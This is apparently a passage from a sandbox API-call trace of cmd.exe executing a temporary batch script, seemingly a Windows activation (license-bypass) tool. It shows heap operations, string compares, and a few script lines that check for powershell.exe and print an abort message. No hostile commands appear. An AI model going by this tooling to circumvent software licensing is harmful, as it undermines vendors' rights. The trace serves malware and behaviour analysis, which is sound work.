Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0177.313] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0177.313] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0177.313] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0177.313] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0177.313] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0177.313] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0177.313] GetProcessHeap () returned 0x19a8f1e0000 [0177.313] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0177.313] GetProcessHeap () returned 0x19a8f1e0000 [0177.313] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb740 [0177.313] GetProcessHeap () returned 0x19a8f1e0000 [0177.314] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb770 [0177.314] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.314] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1058 [0177.314] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea70, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea70*=0x1fff, lpOverlapped=0x0) returned 1 [0177.314] SetFilePointer (in: hFile=0x84, lDistanceToMove=4187, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x105b [0177.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\no MASend\r\nis supported only for Windows 7/8/8.1/10/11 and their Server equivalent.\r\n===================================================\r\n") returned 3 [0177.314] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.314] GetFileType (hFile=0x84) returned 0x1 [0177.314] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.314] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105b [0177.314] GetProcessHeap () returned 0x19a8f1e0000 [0177.314] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.314] GetProcessHeap () returned 0x19a8f1e0000 [0177.315] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.315] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0177.315] _tell (_FileHandle=3) returned 4187 [0177.315] _close (_FileHandle=3) returned 0 [0177.315] wcstol (in: _String="10586", _EndPtr=0x43f9efee70, _Radix=0 | out: _EndPtr=0x43f9efee70*="") returned 10586 [0177.315] wcstol (in: _String="7600", _EndPtr=0x43f9efee78, _Radix=0 | out: _EndPtr=0x43f9efee78*="") returned 7600 [0177.315] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.315] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.316] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.316] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.317] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.317] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.318] SetConsoleInputExeNameW () returned 0x1 [0177.318] GetConsoleOutputCP () returned 0x1b5 [0177.319] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.319] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.320] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.320] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.320] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.320] SetFilePointer (in: hFile=0x84, lDistanceToMove=4187, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x105b [0177.320] GetProcessHeap () returned 0x19a8f1e0000 [0177.321] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0177.321] GetProcessHeap () returned 0x19a8f1e0000 [0177.321] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0177.321] GetProcessHeap () returned 0x19a8f1e0000 [0177.321] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0177.321] GetProcessHeap () returned 0x19a8f1e0000 [0177.321] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0177.322] GetProcessHeap () returned 0x19a8f1e0000 [0177.322] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0177.322] GetProcessHeap () returned 0x19a8f1e0000 [0177.322] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0177.322] GetProcessHeap () returned 0x19a8f1e0000 [0177.322] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0177.322] GetProcessHeap () returned 0x19a8f1e0000 [0177.323] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0177.323] GetProcessHeap () returned 0x19a8f1e0000 [0177.323] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.323] GetProcessHeap () returned 0x19a8f1e0000 [0177.323] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0177.323] GetProcessHeap () returned 0x19a8f1e0000 [0177.323] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0177.323] GetProcessHeap () returned 0x19a8f1e0000 [0177.324] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0177.324] GetProcessHeap () returned 0x19a8f1e0000 [0177.324] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0177.324] GetProcessHeap () returned 0x19a8f1e0000 [0177.324] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0177.324] GetProcessHeap () returned 0x19a8f1e0000 [0177.324] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0177.324] GetProcessHeap () returned 0x19a8f1e0000 [0177.325] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0c70) returned 1 [0177.325] GetProcessHeap () returned 0x19a8f1e0000 [0177.325] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0177.325] GetProcessHeap () returned 0x19a8f1e0000 [0177.325] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0177.325] GetProcessHeap () returned 0x19a8f1e0000 [0177.325] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee610) returned 1 [0177.325] GetProcessHeap () returned 0x19a8f1e0000 [0177.325] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecaa0) returned 1 [0177.325] GetProcessHeap () returned 0x19a8f1e0000 [0177.325] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0177.326] GetProcessHeap () returned 0x19a8f1e0000 [0177.326] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0177.326] GetProcessHeap () returned 0x19a8f1e0000 [0177.326] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0177.326] GetProcessHeap () returned 0x19a8f1e0000 [0177.326] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0177.326] GetProcessHeap () returned 0x19a8f1e0000 [0177.326] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0177.326] GetProcessHeap () returned 0x19a8f1e0000 [0177.326] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0177.326] GetProcessHeap () returned 0x19a8f1e0000 [0177.327] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0177.327] GetProcessHeap () returned 0x19a8f1e0000 [0177.327] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0177.327] GetProcessHeap () returned 0x19a8f1e0000 [0177.327] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc60) returned 1 [0177.327] GetProcessHeap () returned 0x19a8f1e0000 [0177.327] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0177.327] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.327] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105b [0177.328] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.328] SetFilePointer (in: hFile=0x84, lDistanceToMove=4189, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x105d [0177.328] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\no MASend\r\nis supported only for Windows 7/8/8.1/10/11 and their Server equivalent.\r\n===================================================\r\n") returned 2 [0177.328] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.328] GetFileType (hFile=0x84) returned 0x1 [0177.328] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.328] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105d [0177.328] GetProcessHeap () returned 0x19a8f1e0000 [0177.328] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.328] GetProcessHeap () returned 0x19a8f1e0000 [0177.329] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.329] _tell (_FileHandle=3) returned 4189 [0177.329] _close (_FileHandle=3) returned 0 [0177.329] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.329] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.329] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.329] SetFilePointer (in: hFile=0x84, lDistanceToMove=4189, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x105d [0177.329] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.329] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105d [0177.330] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.330] SetFilePointer (in: hFile=0x84, lDistanceToMove=4244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1094 [0177.330] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for %%# in (powershell.exe) do @if \"%%~$PATH:#\"==\"\" (\r\n", cbMultiByte=55, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="for %%# in (powershell.exe) do @if \"%%~$PATH:#\"==\"\" (\r\n1 and their Server equivalent.\r\n===================================================\r\n") returned 55 [0177.330] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.330] GetFileType (hFile=0x84) returned 0x1 [0177.330] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.330] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1094 [0177.330] GetProcessHeap () returned 0x19a8f1e0000 [0177.330] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.330] GetProcessHeap () returned 0x19a8f1e0000 [0177.330] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.331] _wcsicmp (_String1="for", _String2=")") returned 61 [0177.331] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0177.331] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0177.331] GetProcessHeap () returned 0x19a8f1e0000 [0177.331] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0177.331] GetProcessHeap () returned 0x19a8f1e0000 [0177.331] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8be0 [0177.331] GetProcessHeap () returned 0x19a8f1e0000 [0177.331] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0177.331] GetProcessHeap () returned 0x19a8f1e0000 [0177.331] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb710, Size=0x18) returned 0x19a8f1ec6e0 [0177.331] GetProcessHeap () returned 0x19a8f1e0000 [0177.331] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec6e0) returned 0x18 [0177.331] _wcsicmp (_String1="/L", _String2="%#") returned 10 [0177.331] _wcsicmp (_String1="/D", _String2="%#") returned 10 [0177.331] _wcsicmp (_String1="/F", _String2="%#") returned 10 [0177.331] _wcsicmp (_String1="/R", _String2="%#") returned 10 [0177.331] _wcsicmp (_String1="IN", _String2="in") returned 0 [0177.331] GetProcessHeap () returned 0x19a8f1e0000 [0177.331] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0ef0 [0177.331] _wcsicmp (_String1="DO", _String2="do") returned 0 [0177.332] GetProcessHeap () returned 0x19a8f1e0000 [0177.332] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0177.332] _wcsicmp (_String1="if", _String2=")") returned 64 [0177.332] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0177.332] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0177.332] _wcsicmp (_String1="IF", _String2="if") returned 0 [0177.332] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0177.332] GetProcessHeap () returned 0x19a8f1e0000 [0177.332] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0177.332] GetProcessHeap () returned 0x19a8f1e0000 [0177.332] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1eccc0 [0177.332] GetProcessHeap () returned 0x19a8f1e0000 [0177.332] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f8f50 [0177.332] GetProcessHeap () returned 0x19a8f1e0000 [0177.332] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8f50, Size=0x2a) returned 0x19a8f1e0e30 [0177.332] GetProcessHeap () returned 0x19a8f1e0000 [0177.332] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0e30) returned 0x2a [0177.332] _wcsicmp (_String1="\"%~$PATH:#\"", _String2="/I") returned -13 [0177.332] GetProcessHeap () returned 0x19a8f1e0000 [0177.332] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0177.332] GetProcessHeap () returned 0x19a8f1e0000 [0177.332] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb6b0 [0177.332] _wcsicmp (_String1="ERRORLEVEL", _String2="\"%~$PATH:#\"") returned 67 [0177.332] _wcsicmp (_String1="EXIST", _String2="\"%~$PATH:#\"") returned 67 [0177.333] _wcsicmp (_String1="CMDEXTVERSION", _String2="\"%~$PATH:#\"") returned 65 [0177.333] _wcsicmp (_String1="DEFINED", _String2="\"%~$PATH:#\"") returned 66 [0177.333] _wcsicmp (_String1="NOT", _String2="\"%~$PATH:#\"") returned 76 [0177.333] GetProcessHeap () returned 0x19a8f1e0000 [0177.333] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0177.333] GetProcessHeap () returned 0x19a8f1e0000 [0177.333] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec840 [0177.343] GetProcessHeap () returned 0x19a8f1e0000 [0177.343] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0177.344] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.344] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1094 [0177.344] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe920, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe920*=0x1fff, lpOverlapped=0x0) returned 1 [0177.344] SetFilePointer (in: hFile=0x84, lDistanceToMove=4255, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x109f [0177.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nceline%\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="%nceline%\r\n(powershell.exe) do @if \"%%~$PATH:#\"==\"\" (\r\n1 and their Server equivalent.\r\n===================================================\r\n") returned 11 [0177.344] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.344] GetFileType (hFile=0x84) returned 0x1 [0177.344] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.344] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x109f [0177.344] GetProcessHeap () returned 0x19a8f1e0000 [0177.344] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.344] GetProcessHeap () returned 0x19a8f1e0000 [0177.344] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f207840 [0177.344] GetProcessHeap () returned 0x19a8f1e0000 [0177.344] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb950 [0177.344] GetEnvironmentVariableW (in: lpName="nceline", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x22 [0177.345] GetProcessHeap () returned 0x19a8f1e0000 [0177.345] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0177.345] GetProcessHeap () returned 0x19a8f1e0000 [0177.346] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207840) returned 1 [0177.346] GetProcessHeap () returned 0x19a8f1e0000 [0177.346] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.346] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.346] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.346] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.346] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.346] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.346] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.346] GetProcessHeap () returned 0x19a8f1e0000 [0177.346] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0177.347] GetProcessHeap () returned 0x19a8f1e0000 [0177.347] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb740 [0177.347] GetProcessHeap () returned 0x19a8f1e0000 [0177.347] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec860 [0177.347] GetProcessHeap () returned 0x19a8f1e0000 [0177.347] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0177.347] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.347] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.347] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.347] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.347] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.347] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.347] GetProcessHeap () returned 0x19a8f1e0000 [0177.347] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0177.347] GetProcessHeap () returned 0x19a8f1e0000 [0177.347] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb800 [0177.347] GetProcessHeap () returned 0x19a8f1e0000 [0177.347] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e09b0 [0177.347] GetProcessHeap () returned 0x19a8f1e0000 [0177.347] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0177.347] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.347] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.347] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.348] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.348] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.348] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.348] GetProcessHeap () returned 0x19a8f1e0000 [0177.348] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0177.348] GetProcessHeap () returned 0x19a8f1e0000 [0177.348] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb7a0 [0177.348] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.348] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x109f [0177.348] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe860, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe860*=0x1fff, lpOverlapped=0x0) returned 1 [0177.348] SetFilePointer (in: hFile=0x84, lDistanceToMove=4306, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10d2 [0177.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Unable to find powershell.exe in the system.\r\n", cbMultiByte=51, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Unable to find powershell.exe in the system.\r\n (\r\n1 and their Server equivalent.\r\n===================================================\r\n") returned 51 [0177.348] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.348] GetFileType (hFile=0x84) returned 0x1 [0177.348] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.348] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10d2 [0177.349] GetProcessHeap () returned 0x19a8f1e0000 [0177.349] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.349] GetProcessHeap () returned 0x19a8f1e0000 [0177.350] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.350] GetProcessHeap () returned 0x19a8f1e0000 [0177.350] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0177.350] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.350] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.350] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.350] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.350] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.350] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.350] GetProcessHeap () returned 0x19a8f1e0000 [0177.350] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0177.350] GetProcessHeap () returned 0x19a8f1e0000 [0177.350] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0177.350] GetProcessHeap () returned 0x19a8f1e0000 [0177.350] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x6c) returned 0x19a8f1eaed0 [0177.350] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.350] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10d2 [0177.351] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x1fff, lpOverlapped=0x0) returned 1 [0177.351] SetFilePointer (in: hFile=0x84, lDistanceToMove=4324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10e4 [0177.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Aborting...\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Aborting...\r\nd powershell.exe in the system.\r\n (\r\n1 and their Server equivalent.\r\n===================================================\r\n") returned 18 [0177.351] _get_osfhandle (_FileHandle=3) returned 0x84 